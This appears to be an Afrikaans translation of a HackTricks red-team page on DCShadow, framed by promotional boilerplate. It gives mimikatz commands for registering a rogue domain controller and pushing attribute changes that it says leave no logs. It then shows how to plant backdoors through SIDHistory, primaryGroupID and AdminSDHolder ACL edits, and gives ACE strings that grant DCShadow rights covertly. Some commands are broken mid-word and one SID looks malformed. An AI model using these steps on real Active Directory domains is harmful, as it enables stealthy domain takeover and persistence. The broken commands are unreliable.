6.7 KiB
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslagplekke.
DCShadow
Dit registreer 'n nuwe Domeinbeheerder in die AD en gebruik dit om aantekeninge (SIDHistory, SPNs...) op gespesifiseerde voorwerpe te stuur sonder om enige logboeke oor die veranderings agter te laat. Jy benodig DA-voorregte en moet binne die hoofdomein wees.
Let daarop dat as jy verkeerde data gebruik, sal lelike logboeke verskyn.
Om die aanval uit te voer, het jy 2 mimikatz-instanties nodig. Een daarvan sal die RPC-bediener begin met SYSTEM-voorregte (jy moet hier aandui watter veranderinge jy wil uitvoer), en die ander instantie sal gebruik word om die waardes te stuur:
{% code title="mimikatz1 (RPC-bediener)" %}
!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"
{% code title="mimikatz2 (druk) - Benodig DA of soortgelyk" %}
lsadump::dcshadow /push
{% endcode %}
Let daarop dat elevate::token
nie in die mimikatz1
-sessie sal werk nie, omdat dit die voorregte van die draad verhoog, maar ons moet die voorregte van die proses verhoog.
Jy kan ook 'n "LDAP" voorwerp kies: /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local
Jy kan die veranderinge vanaf 'n DA of vanaf 'n gebruiker met hierdie minimale toestemmings stuur:
- In die domeinvoorwerp:
- DS-Install-Replica (Voeg/Verwyder Replica in Domein by)
- DS-Replication-Manage-Topology (Bestuur Replicasie-topologie)
- DS-Replication-Synchronize (Replicasie-sinkronisering)
- Die Sites-voorwerp (en sy kinders) in die Konfigurasiehouer:
- CreateChild en DeleteChild
- Die voorwerp van die rekenaar wat as 'n DC geregistreer is:
- WriteProperty (Nie Skryf nie)
- Die teiken voorwerp:
- WriteProperty (Nie Skryf nie)
Jy kan Set-DCShadowPermissions gebruik om hierdie voorregte aan 'n onbevoorregte gebruiker te gee (let daarop dat dit 'n paar logboeke sal agterlaat). Dit is baie beperkend as om DA-voorregte te hê.
Byvoorbeeld: Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose
Dit beteken dat die gebruikersnaam student1 wanneer dit aangemeld is op die rekenaar mcorp-student1, DCShadow-voorregte oor die voorwerp root1user het.
Gebruik van DCShadow om agterdeure te skep
{% code title="Stel Enterprise Admins in SIDHistory in op 'n gebruiker" %}
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519
{% code title="Verander PrimaryGroupID (stel gebruiker as lid van Domeinadministrators)" %}
lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519
{% code title="Wysig ntSecurityDescriptor van AdminSDHolder (gee Volle Beheer aan 'n gebruiker)" %}
#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>
{% endcode %}
Shadowception - Gee DCShadow-regte met behulp van DCShadow (geen gewysigde regte logs)
Ons moet die volgende ACE's byvoeg met ons gebruiker se SID aan die einde:
- Op die domeinobjek:
(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
- Op die aanvallerrekenaarobjek:
(A;;WP;;;UserSID)
- Op die teikengebruikerobjek:
(A;;WP;;;UserSID)
- Op die Sites-objek in die Konfigurasiehouer:
(A;CI;CCDC;;;UserSID)
Om die huidige ACE van 'n objek te kry: (New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl
Let daarop dat jy in hierdie geval verskeie veranderinge moet maak, nie net een nie. Gebruik dus in die mimikatz1-sessie (RPC-bediener) die parameter /stack
met elke verandering wat jy wil maak. Op hierdie manier hoef jy slegs een keer /push
te gebruik om al die vasgesteekte veranderinge in die bedrieglike bediener uit te voer.
Meer inligting oor DCShadow in ired.team.
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.